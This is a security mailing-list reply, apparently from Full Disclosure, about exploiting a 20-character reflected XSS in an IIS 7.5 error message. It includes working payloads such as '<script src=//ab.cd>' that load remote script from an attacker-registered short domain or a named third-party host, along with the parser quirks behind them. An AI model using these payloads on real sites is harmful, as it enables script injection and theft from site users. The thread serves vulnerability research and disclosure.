Re: XSS (in 20 chars) in Microsoft IIS 7.5 error message

[waysea <waysea () rtwaysea net>]

If you can get a <script> tag in (usually the very first tag to be 
blacklisted), you could
1. register a two character domain with a two character TLD (all the 
single character domains with two letter TLDs had been taken the last 
time I checked)
2. have the root page be an index.js file (instead of index.html)
3. use something like:

A) <script src=//ab.cd>
or
B) <script/src=//ef.gh>

Without knowing more about your specific situation, either of the above 
*_should_* work as HTML parsers are usually very lenient on what they 
allow. So:
1. There doesn't usually need to be a close script </script> tag.
2. After declaring a src, any text that might be inline JavaScript is 
ignored.
3. Immediately after the tag name declaration, the / character can be 
used in place of a space (but not for any other attributes after that).
4. By starting off with // in the src definition, the parser will simply 
use whatever protocol (http or https) the current page is on and 
automagically insert it into the script request.
5. As you already know, the HTML parser doesn't need to have the 
attribute value enclosed in ' or " characters, and will see the > 
character as the end of the tag, not part of the attribute value.

Of course, if the DOCTYPE is XHTML instead of HTML, then some of the 
above is no longer valid.

If you don't want to register a domain, the guy that owns http://xy.vg 
has that setup already in place and is usually cool about people using 
that in their proof of concepts as long as you send an email beforehand 
stating what you're doing with it (see http://xy.vg/about/). It is http 
only at the moment (no https yet), so if your error page is over https 
then mixed content rules may come into play and prevent the script from 
loading.


On 11/27/2014 10:35 AM, A Z wrote:
> Hello everyone,
>
>
> I found some weird HTML code injection in an IIS error message. IIS spits
> out some part of the user input that generated the error message, but will
> only display 20 characters at most.
> My question is: is it possible to actually exploit an XSS with this ?
>
> Here is an example:
>
> HTTP Request: mypage?search=%3cb%20onclick%3dalert(1)>%3e
> HTTP Response (real):
>
> <p>An error has occured.</p>
>      <p>Exception HttpRequestValidationException occurred while attempting
> <b>mypage</b></p>
>      <p>Exception message is: <b>A potentially dangerous Request.QueryString
> value was detected from the client (search="<b
> onclick=alert(1)>...").</b></p>
>      <p>Stack trace:</p>
>      <pre>
> Server stack trace:
> [..]
>
> My payload was: <b onclick=alert(1)>> and it works (after clicking).
> However, can this actually be exploited in real life ? I tried stuff in 20
> characters like: <embed src=http://x> or <img src=http://x/z> but no luck.
> Has anyone ever tried this before ?
>
> Thanks,
>
> P.S. This might be a silly question with an obvious answer. If so, I'd be
> grateful to have some extra information (links, docs etc.).
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/